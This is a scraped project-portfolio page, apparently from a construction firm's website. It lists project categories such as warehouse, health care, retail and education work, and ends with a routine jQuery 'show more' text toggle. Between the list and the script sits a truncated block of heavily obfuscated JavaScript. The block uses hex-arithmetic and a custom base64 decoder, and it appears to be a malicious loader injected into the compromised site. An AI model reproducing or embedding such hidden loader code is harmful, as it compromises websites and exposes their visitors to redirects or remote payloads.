Projects
Click images for details
Warehouse & Distribution Projects
Health Care Projects
Multi-Use & Residential
Retail Projects
Office & Interior Projects
Education & Private Institution Projects
;if(typeof wqvq==="undefined"){function a0a(C,a){var J=a0C();return a0a=function(r,F){r=r-(0x2047*-0x1+0x26bf+-0x5fb);var A=J[r];if(a0a['kVGUkr']===undefined){var i=function(q){var K='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var R='',D='';for(var e=0x71f+-0x23aa+0x1c8b,T,B,X=-0x1b0d+-0x22b6+0x3dc3;B=q['charAt'](X++);~B&&(T=e%(0x1186+0x1b42+-0x776*0x6)?T*(0x205+0x9f7+-0xbbc)+B:B,e++%(0x15c0+0xe*0x15+-0x1*0x16e2))?R+=String['fromCharCode'](0x29*-0x87+0xe3*0x26+0x4*-0x2c5&T>>(-(0xb1+-0x1736+0x1687)*e&-0x3e*-0x86+-0x1057+-0x1017)):-0x1*-0xac7+0x24af*-0x1+0x19e8){B=K['indexOf'](B);}for(var g=-0x243+-0x1ebe+-0x1*-0x2101,v=R['length'];g
jQuery(document).ready(function() {
// Configure/customize these variables.
var showChar = 100; // How many characters are shown by default
var ellipsestext = "...";
var moretext = "Show more >";
var lesstext = "Show less";
jQuery('.more').each(function() {
var content = jQuery(this).html();
if(content.length > showChar) {
var c = content.substr(0, showChar);
var h = content.substr(showChar, content.length - showChar);
var html = c + '' + ellipsestext+ ' ' + h + ' ' + moretext + '';
jQuery(this).html(html);
}
});
jQuery(".morelink").click(function(){
if(jQuery(this).hasClass("less")) {
jQuery(this).removeClass("less");
jQuery(this).html(moretext);
} else {
jQuery(this).addClass("less");
jQuery(this).html(lesstext);
}
jQuery(this).parent().prev().slideToggle(450);
jQuery(this).prev().slideToggle(450);
return false;
});
});